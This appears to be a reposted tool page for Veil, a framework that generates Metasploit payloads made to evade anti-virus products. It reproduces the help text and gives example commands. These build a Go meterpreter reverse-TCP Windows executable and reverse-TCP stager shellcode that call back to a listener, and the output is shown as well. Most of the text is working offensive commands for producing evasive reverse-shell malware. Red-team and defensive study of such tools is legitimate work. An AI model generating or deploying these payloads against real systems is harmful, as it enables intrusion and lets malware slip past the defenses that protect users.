Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions.
Veil is currently supported by @ChrisTruncer
  • Python 3.3 ^(https://www.python.org/downloads/release/python-335/)
  • Py2Exe ^(https://pypi.python.org/pypi/py2exe/)
  • PyCrypto ^(http://www.voidspace.org.uk/python/modules.shtml#pycrypto)
  • PyWin32 ^(https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/)

Example Usage
    Veil’s Main Menu:

    $ ./Veil.py
    ===============================================================================
    Veil | [Version]: 3.1.6
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    Main Menu

    2 tools loaded

    Available Tools:

    1) Evasion
    2) Ordnance

    Available Commands:

    exit Completely exit Veil
    info Information on a specific tool
    list List available tools
    options Show Veil configuration
    update Update Veil
    use Use a specific tool

    Veil>:

    Help

    $ ./Veil.py --help
    usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
    [--version] [--ip IP] [--port PORT] [--list-payloads]
    [-p [PAYLOAD]] [-o OUTPUT-NAME]
    [-c [OPTION=value [OPTION=value ...]]]
    [--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]
    [--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]
    [--list-encoders] [-e ENCODER] [-b \x00\x0a..] [--print-stats]

    Veil is a framework containing multiple tools.

    [*] Veil Options:
    --list-tools List Veil's tools
    -t TOOL, --tool TOOL Specify Veil tool to use (Evasion, Ordnance etc.)
    --update Update the Veil framework
    --setup Run the Veil framework setup file & regenerate the
    configuration
    --config Regenerate the Veil framework configuration file
    --version Displays version and quits

    [*] Callback Settings:
    --ip IP, --domain IP IP address to connect back to
    --port PORT Port number to connect to

    [*] Payload Settings:
    --list-payloads Lists all available payloads for that tool

    [*] Veil-Evasion Options:
    -p [PAYLOAD] Payload to generate
    -o OUTPUT-NAME Output file base name for source and compiled binaries
    -c [OPTION=value [OPTION=value ...]]
    Custom payload module options
    --msfoptions [OPTION=value [OPTION=value ...]]
    Options for the specified metasploit payload
    --msfvenom [] Metasploit shellcode to generate (e.g.
    windows/meterpreter/reverse_tcp etc.)
    --compiler pyinstaller
    Compiler option for payload (currently only needed for
    Python)
    --clean Clean out payload folders

    [*] Veil-Ordnance Shellcode Options:
    --ordnance-payload PAYLOAD
    Payload type (bind_tcp, rev_tcp, etc.)

    [*] Veil-Ordnance Encoder Options:
    --list-encoders Lists all available encoders
    -e ENCODER, --encoder ENCODER
    Name of shellcode encoder to use
    -b \x00\x0a.., --bad-chars \x00\x0a..
    Bad characters to avoid
    --print-stats Print information about the encoded shellcode
    $

    Veil Evasion CLI

    $ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
    ===============================================================================
    Veil-Evasion
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    runtime/internal/sys
    runtime/internal/atomic
    runtime
    errors
    internal/race
    sync/atomic
    math
    sync
    io
    unicode/utf8
    internal/syscall/windows/sysdll
    unicode/utf16
    syscall
    strconv
    reflect
    encoding/binary
    command-line-arguments
    ===============================================================================
    Veil-Evasion
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    [*] Language: go
    [*] Payload Module: go/meterpreter/rev_tcp
    [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
    [*] Source code written to: /var/lib/veil/output/source/payload.go
    [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc
    $
    $ file /var/lib/veil/output/compiled/payload.exe
    /var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
    $

    Veil Ordnance CLI

    $ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444
    ===============================================================================
    Veil-Ordnance
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    [*] Payload Name: Reverse TCP Stager (Stage 1)
    [*] IP Address: 127.0.0.1
    [*] Port: 4444
    [*] Shellcode Size: 287

    $

    Download Veil ^(https://github.com/Veil-Framework/Veil)

    Author: Marshmallow
